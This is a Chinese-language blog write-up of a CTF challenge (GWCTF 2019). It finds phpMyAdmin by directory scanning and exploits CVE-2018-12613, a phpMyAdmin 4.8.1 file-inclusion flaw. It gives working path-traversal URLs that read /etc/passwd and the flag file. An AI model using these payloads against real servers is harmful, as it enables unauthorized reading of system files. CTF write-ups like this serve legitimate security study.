首页 > 数据库 >奇怪的数据库

奇怪的数据库

时间:2023-09-17 19:13:21浏览次数:35  
标签:phpmyadmin target .. passwd 数据库 db 奇怪

来自

[GWCTF 2019]我有一个数据库

抽象题目,但其实没啥技术含量,只需要你能找到切入关键就行。

打开一看就是中文乱码:

放到赛博厨子的magic里,开启intensive模块看看能不能梭出来东西:

看是看到了,但是没啥用啊。

源码也没东西。

记住,当你走投无路的时候,就用dirsearch扫吧,基本有信息泄露才会有进一步,除非题目的相关信息直接能搜出来。

数据库,啥也没有,只能扫了:

那就直接访问这个phpmyadmin和这几个目录试试,这个phpmyadmin是一个数据库管理系统:

(补充--看看百度百科的解释:)

也没啥信息,但是知道这个方向应该对了。

进来我也没啥方法,这里只有去搜phpmyadmin的漏洞,看看能不能黑了。

 

还真有,叫做:

文件包含,phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)

即到4.8.1版本存在任意文件读取漏洞,这里可以文件路径穿越。

 

首先肯定是用经典的/etc/passwd试试水:

/phpmyadmin/index.php?target=db_datadict.php%253f../../../../../../etc/passwd

也可以:

/phpmyadmin/?target=db_sql.php%253f/../../../../../../../../etc/passwd

那直接穿就完事了:

/phpmyadmin/?target=db_sql.php%253f/../../../../../../../../../flag

确实没啥技术含量,就是要会搜。

标签:phpmyadmin,target,..,passwd,数据库,db,奇怪
From: https://www.cnblogs.com/EddieMurphy-blogs/p/17709482.html

相关文章

  • 33. 数据库编程
    一、数据库编程接口  程序运行的时候,数据都是在内存中的。当程序终止的时候,通常都需要将数据保存到磁盘上。为了便于程序保存的读取数据,并能直接通过条件查询跨快速查询指定的数据,就出现了数据库(Database)这种专门用于集中存储和查询的软件。  在Python中提供了数据库连接......
  • MySQL数据库管理
    MySQL数据库管理数据库-->数据表-->行(记录):用来描述一个对象的信息列(字段):用来描述对象的一个属性常用的数据类型:int:整型无符号[0,2^32-1],有符号[-2^31,2^31-1]float:单精度浮点4字节32位double:双精度浮点8字节64位char:固定长度的字符类型varchar:可变长度的字符类型......
  • 数据库中的基本函数
    数据库中的函数1字符串函数concat(s1,s2,...,sn)字符串拼接,将s1,s2,...,sn拼接成一个字符串lower(str)将字符串str全部转为小写upper(str)将字符串str全部转为大写lpad(str,n,pad)左填充,用字符串pad对str的左边进行填充,达到n个字符串长度rpad(str,n,pad)右填充,用字符串pad......
  • 如何修改MySQL数据库名称
    需求比如数据库名称old_db想改名为new_dbMySQL修改数据库名称比较麻烦,不支持直接修改,需要通过其它方式间接达到修改数据库名称的目的。在MySQL5.1.23之前的旧版本中,我们可以使用RENAMEDATABASE来重命名数据库,但此后版本,因为安全考虑,删掉了这一命令。先导出数据,再导入数......
  • 数据库初始化
    数据库初始化 1-配置用户1.1创建组groupaddyw1.2创建用户useradd-d/home/yw-gywyw1.3修改用户密码passwdyw1.4查看是否存在cat/etc/passwd|grepyw 2-数据库初始化2.1登录Oracle服务器,切换到oracle用户su-oracle2.2创建临时目录mkdir/home/oracle/tem......
  • 分布式数据库(背)
          ......
  • P2759 奇怪的函数
    不学不知道,做过初升高暑假作业就会了。\[\largex=10^{\log_{10}^x}\]\[\largex^x=\left(10^{\log_{10}^x}\right)^x=10^{x\log_{10}^x}\]因为是达到或超过,所以指数下取整加一即是位数。然而\(x\)的范围比较大,直接枚举不行,要二分。......
  • 数据库的备份与恢复
          ......
  • 三、(4)数据库的基本操作
    数据库存储引擎是数据库底层软件组织,数据库管理系统(DBMS)使用数据引擎进行创建、查询、更新和删除数据。不同的存储引擎提供不同的存储机制、索引、锁定等功能,使用不同的存储引擎,还可以获得特定的功能。现在许多不同的数据库管理系统都支持多种不同的数据引擎。MySQL的核心就是存......
  • 三、(3)Mysql数据库的安装
    关闭防火墙和selinux1、编译安装mysql5.71、清理安装环境:#yumerasemariadbmariadb-servermariadb-libsmariadb-devel-y#userdel-rmysql#rm-rf/etc/my*#rm-rf/var/lib/mysql2、创建mysql用户[root@mysql-server~]#useradd-rmysql-M-s/bin/false#-M-s/b......